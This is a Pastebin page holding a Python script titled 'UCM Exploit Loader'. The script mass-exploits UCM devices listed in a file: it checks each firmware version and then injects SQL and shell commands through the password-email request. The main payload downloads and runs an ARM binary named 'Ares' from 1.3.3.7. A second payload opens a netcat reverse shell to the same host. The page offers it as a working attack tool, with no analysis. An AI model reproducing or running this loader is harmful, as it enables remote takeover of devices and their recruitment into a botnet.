API tools faq
paste
Advertisement
KhaosBringer

UCM Exploit Loader.c

KhaosBringer
Nov 21st, 2020
1,253
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.85 KB | None | 0 0
raw download clone embed print report
  1. import os
  2. import re
  3. import sys
  4. import json
  5. import argparse
  6. import requests
  7. import threading
  8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  9. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  10. # UCM Exploit Loader made by B4CKDOOR - PRIVATE #
  11. # B4CKDOORARCHIVE.CLUB #
  12.  
  13. #$top_parser = argparse.ArgumentParser(description='')
  14. #$top_parser.add_argument('--rhost', action="store", dest="rhost",
  15. #$required=True, help="The remote host to connect to")
  16. #$top_parser.add_argument('--rport', action="store", dest="rport", type=int,
  17. #$help="The remote port to connect to", default=8089)
  18. #$top_parser.add_argument('--lhost', action="store", dest="lhost",
  19. #$required=True, help="The local host to connect back to")
  20. #$top_parser.add_argument('--lport', action="store", dest="lport", type=int,
  21. #$help="The local port to connect back to", default=1270)
  22. #$args = top_parser.parse_args()
  23.  
  24.  
  25. class Loader(object):
  26.  
  27.     def infect(self, adress: str):
  28.         url = 'https://' + adress + ':' + "8089" + '/cgi'
  29.         print('[+] Sending getInfo request to ', url)
  30.  
  31.         try:
  32.             resp = requests.post(url=url, data='action=getInfo', verify=False)
  33.         except Exception:
  34.             print('[-] Error connecting to remote target')
  35.             sys.exit(1)
  36.        
  37.         if resp.status_code != 200:
  38.             print('[-] Did not get a 200 OK on getInfo request')
  39.             sys.exit(1)
  40.        
  41.         if resp.text.find('{ "response":') != 0:
  42.             print('[-] Unexpected response')
  43.             sys.exit(1)
  44.        
  45.         try:
  46.             parsed_response = json.loads(resp.text)
  47.         except Exception:
  48.             print('[-] Unable to parse json response')
  49.             sys.exit(1)
  50.        
  51.         print('[+] Remote target info: ')
  52.         print('\t-> Model: ', parsed_response['response']['model_name'])
  53.         print('\t-> Version: ', parsed_response['response']['prog_version'])
  54.        
  55.         match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
  56.         parsed_response['response']['prog_version'])
  57.         if not match:
  58.             print('[-] Failed to extract the remote targets version')
  59.             sys.exit(1)
  60.        
  61.         major = int(match[1])
  62.         minor = int(match[2])
  63.         point = int(match[3])
  64.         patch = int(match[4])
  65.        
  66.         if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
  67.         and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
  68.         20):
  69.             print('[-] Unaffected version')
  70.             sys.exit(1)
  71.         else:
  72.             print('[+] Vulnerable version!')
  73.  
  74.         print("[+] loaded, %s" %(adress))
  75.         try:
  76.             exploit = "admin\' or 1=1--`;cd /var/; wget http://1.3.3.7/Ares.arm6 ; chmod 777 Ares.arm6 ; ./Ares.arm6 ARES" #arm7
  77.             exploit2 = 'admin\' or 1=1--`;`nc${IFS}' + "1.3.3.7" + '${IFS}' + "1270" + '${IFS}-e${IFS}/bin/sh`;`'
  78.             resp = requests.post(url=url,
  79.         data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
  80.         except Exception as err:
  81.             print('[-] Failed to send payload')
  82.             sys.exit(1)
  83.        
  84.         if resp.status_code != 200:
  85.             print('[-] Did not get a 200 OK on sendPasswordEmail request')
  86.             sys.exit(1)
  87.        
  88.         try:
  89.             parsed_response = json.loads(resp.text)
  90.         except Exception:
  91.             print('[-] Unable to parse json response')
  92.             sys.exit(1)
  93.        
  94.         if parsed_response['status'] == 0:
  95.             print('[+] Success! Clean exit.')
  96.         else:
  97.             print('[-] Something bad happened.')
  98.            
  99.     def __init__(self, adress: str):
  100.         self.infect(adress)
  101.  
  102. with open(sys.argv[1], "r") as f:
  103.     for item in f.readlines():
  104.         threading.Thread(target=Loader, args=(item.rstrip(), )).start()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!